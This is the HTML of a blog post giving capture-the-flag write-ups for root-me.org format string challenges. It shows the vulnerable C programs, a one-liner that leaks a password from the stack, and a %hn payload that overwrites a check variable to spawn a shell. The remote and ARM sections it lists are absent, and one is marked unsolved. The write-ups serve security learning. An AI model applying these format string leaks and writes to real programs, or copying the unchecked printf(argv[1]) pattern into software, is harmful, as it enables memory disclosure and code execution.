<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.5.0 -->
<title>root-me:Format string bug | DoubleMice</title>
<meta name="generator" content="Jekyll v3.7.3" />
<meta property="og:title" content="root-me:Format string bug" />
<meta name="author" content="DoubleMice" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="I&#39;d stayed away from pwn for several months because of my own fucking thoughts. These days i was dived into ICS program assignment again and it&#39;s make me so gloomy. To get more funny,the article appeared. The article is aimed at summarizing the general way to exploit format string bugs. All the challenges could be found on root-me.org Attachment N-Introduction-to-format-string-exploits EN - Format Bugs - Exploiting format string Content ELF x86 - Format string bug basic 1 ELF x86 - Format string bug basic 2 ELF x86 - Format String Bug Basic 3 &darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;FLAG~FLAG~FLAG~&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr; ELF x86 - Remote Format String bug ELF x86 - Blind remote format string bug ELF ARM - Heap format string bug ELF ARM - Format String bug ELF x86 - Format string bug basic 1 It is the time i feel i am very stupid...Let&#39;s see the code: #include #include" />
<meta property="og:description" content="I&#39;d stayed away from pwn for several months because of my own fucking thoughts. These days i was dived into ICS program assignment again and it&#39;s make me so gloomy. To get more funny,the article appeared. The article is aimed at summarizing the general way to exploit format string bugs. All the challenges could be found on root-me.org Attachment N-Introduction-to-format-string-exploits EN - Format Bugs - Exploiting format string Content ELF x86 - Format string bug basic 1 ELF x86 - Format string bug basic 2 ELF x86 - Format String Bug Basic 3 &darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;FLAG~FLAG~FLAG~&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr; ELF x86 - Remote Format String bug ELF x86 - Blind remote format string bug ELF ARM - Heap format string bug ELF ARM - Format String bug ELF x86 - Format string bug basic 1 It is the time i feel i am very stupid...Let&#39;s see the code: #include #include" />
<link rel="canonical" href="http://localhost:4000/pwn/root-me/2018/01/28/format-string-bug.html" />
<meta property="og:url" content="http://localhost:4000/pwn/root-me/2018/01/28/format-string-bug.html" />
<meta property="og:site_name" content="DoubleMice" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-01-28T22:34:44+08:00" />
<script type="application/ld+json">
{"description":"I&#39;d stayed away from pwn for several months because of my own fucking thoughts. These days i was dived into ICS program assignment again and it&#39;s make me so gloomy. To get more funny,the article appeared. The article is aimed at summarizing the general way to exploit format string bugs. All the challenges could be found on root-me.org Attachment N-Introduction-to-format-string-exploits EN - Format Bugs - Exploiting format string Content ELF x86 - Format string bug basic 1 ELF x86 - Format string bug basic 2 ELF x86 - Format String Bug Basic 3 &darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;FLAG~FLAG~FLAG~&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr; ELF x86 - Remote Format String bug ELF x86 - Blind remote format string bug ELF ARM - Heap format string bug ELF ARM - Format String bug ELF x86 - Format string bug basic 1 It is the time i feel i am very stupid...Let&#39;s see the code: #include #include","author":{"@type":"Person","name":"DoubleMice"},"@type":"BlogPosting","url":"http://localhost:4000/pwn/root-me/2018/01/28/format-string-bug.html","headline":"root-me:Format string bug","dateModified":"2018-01-28T22:34:44+08:00","datePublished":"2018-01-28T22:34:44+08:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/pwn/root-me/2018/01/28/format-string-bug.html"},"@context":"http://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="DoubleMice" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">DoubleMice</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/aboutme.html">AboutMe</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">root-me:Format string bug</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2018-01-28T22:34:44+08:00" itemprop="datePublished">Jan 28, 2018
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">DoubleMice</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>I'd stayed away from pwn for several months because of my own fucking thoughts.<br />
These days i was dived into ICS program assignment again and it's make me so gloomy.<br />
To get more funny,the article appeared.<br />
The article is aimed at summarizing the general way to exploit format string bugs.<br />
All the challenges could be found on <a href="https://root-me.org">root-me.org</a></p>
<h2>Attachment</h2>
<p><a href="http://403forbidden.website/wp-content/uploads/2018/02/EN-Introduction-to-format-string-exploits.pdf">N-Introduction-to-format-string-exploits</a><br />
<a href="http://403forbidden.website/wp-content/uploads/2018/01/EN-Format-Bugs-Exploiting-format-string.pdf">EN - Format Bugs - Exploiting format string</a></p>
<h2>Content</h2>
<ul>
<li><a href="#elf-86-b-1">ELF x86 - Format string bug basic 1</a></li>
<li><a href="#elf-86-b-2">ELF x86 - Format string bug basic 2</a></li>
<li><a href="#elf-86-b-3">ELF x86 - Format String Bug Basic 3</a></li>
</ul>
<p>&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;FLAG~FLAG~FLAG~&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;&darr;</p>
<ul>
<li><a href="#elf-86-remote">ELF x86 - Remote Format String bug</a></li>
<li><a href="#elf-86-blind-remote">ELF x86 - Blind remote format string bug</a></li>
<li><a href="#elf-arm-heap-string">ELF ARM - Heap format string bug</a></li>
<li><a href="#elf-arm-format">ELF ARM - Format String bug</a></li>
</ul>
<h2><a name="elf-86-b-1">ELF x86 - Format string bug basic 1</a></h2>
<p>It is the time i feel i am very stupid...Let's see the code:</p>
<pre><code>#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]){
    FILE *secret = fopen("/challenge/app-systeme/ch5/.passwd", "rt");
    char buffer[32];
    fgets(buffer, sizeof(buffer), secret);
    printf(argv[1]);
    fclose(secret);
    return 0;
</code></pre>
<p>It's extremely simple,right?<br />
We know the <code>buffer</code> is always on the stack,no matter how the stack changed<br />
so we just print enough stack frame,<br />
then adjust them into little-endient,<br />
transfer them into ascii,<br />
and the printable characters are our answer.</p>
<p>A wonderful script from Internet:</p>
<pre><code>echo -e $(./ch5 $(python -c 'print "%08x" * 20') | sed -r '
        # little-endian architecture, reorder bytes
        s/(..)(..)(..)(..)//g
        # preceed every byte by \x so it will be
        # interpreted by echo -e
        s/(..)/\x&amp;/g
    ' ) | grep -Pazo '[[:print:]]{13}\n'
</code></pre>
<h2><a name="elf-86-b-2">ELF x86 - Format string bug basic 2</a></h2>
<p>What we should notice is that character '$' must be escaped with '\'</p>
<p>the push order of the params of <code>printf()</code>,for example:</p>
<pre><code class="c">printf("Color %s, Number %d, Float %4.2f", color, num, f_num);
</code></pre>
<p>the stack layout is:</p>
<pre><code class="python">[stack  bottom]
[ f_num value ]
[  num value  ]
[ color value ]
[format string]
[  stack top  ]
</code></pre>
<p>ch14:</p>
<pre><code class="c">#include <stdio.h>
#include <stdlib.h>
/*
gcc -m32 -o ch14 ch14.c
*/
int main( int argc, char ** argv )
{

        int var;
        int check  = 0x04030201;
        char fmt[128];
        if (argc <2)
                exit(0);
        memset( fmt, 0, sizeof(fmt) );
        printf( "check at 0x%x\n", &amp;check );
        printf( "argv[1] = [%s]\n", argv[1] );
        snprintf( fmt, sizeof(fmt), argv[1] );
        if ((check != 0x04030201) &amp;&amp; (check != 0xdeadbeef))
                printf ("\nYou are on the right way !\n");
        printf( "fmt=[%s]\n", fmt );
        printf( "check=0x%x\n", check );
        if (check==0xdeadbeef)
        {
                printf("Yeah dude ! You win !\n");
                system("/bin/bash");
        }
}
</code></pre>
<pre><code class="bash">app-systeme-ch14@challenge02:~$ ./ch14 aaaaa
check at 0xbffffb38
argv[1] = [aaaaa]
fmt=[aaaaa]
check=0x4030201

app-systeme-ch14@challenge02:~$ ./ch14 "AAAA %x %x %x %x %x %x %x %x %x %x"
check at 0xbffffb28
argv[1] = [AAAA %x %x %x %x %x %x %x %x %x %x]
fmt=[AAAA b7fdc4a0 1 0 1 bffffc54 0 0 4030201 41414141 66376220]
check=0x4030201

app-systeme-ch14@challenge02:~$ ./ch14 "AAAAaaaa %x %x %x %x %x %x %x %x %x %x"
check at 0xbffffb18
argv[1] = [AAAAaaaa %x %x %x %x %x %x %x %x %x %x]
fmt=[AAAAaaaa b7fdc4a0 1 0 1 bffffc44 0 0 4030201 41414141 61616161]
check=0x4030201
</code></pre>
<p>As we see,<code>AAAA(41414141)</code> has been recorded at the ninth location after <code>AAAA</code><br />
So we have a methond to write <code>0xdeadbeef</code> to aim address:<br />
let it record the check address,write the aim value to check address use <code>%?$n</code></p>
<p><code>%?$n</code>:the length of last output as input,write to ?th param</p>
<p>After this,its layout will be:</p>
<pre><code>fmt=['beef address,dead address' b7fdc4a0 1 0 1 bffffc44 0 0 4030201 'beef address' 'dead address']
</code></pre>
<p>payload:</p>
<pre><code>./ch14 $(python -c "print '\x28\xfb\xff\xbf'+'\x2a\xfb\xff\xbf'+'%48871x%9\$hn'+'%8126x%10\$hn'")
</code></pre>
<p><code>0xdeadbeef</code> is too large when as a decimal value,we have to devide it into <code>0xbeef</code> and <code>0xdead</code>.The machine is little-endient,so <code>0xbeef</code> is at the ninth one and <code>0xdead</code> is at the tenth one.<br />
<code>h</code> means 'half of machine word',the machine word of training machine is 32 bits.</p>
<p>(#@2017.12)</p>
<h2><a name="elf-86-b-3">ELF x86 - Format string bug basic 3</a></h2>
<p>no idea yet</p>

  </div><a class="u-url" href="/pwn/root-me/2018/01/28/format-string-bug.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">DoubleMice</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">DoubleMice</li><li><a class="u-email" href="mailto:foxwest@qq.com">foxwest@qq.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/DoubleMice"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">DoubleMice</span></a></li><li><a href="https://www.twitter.com/__Socrates"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">__Socrates</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
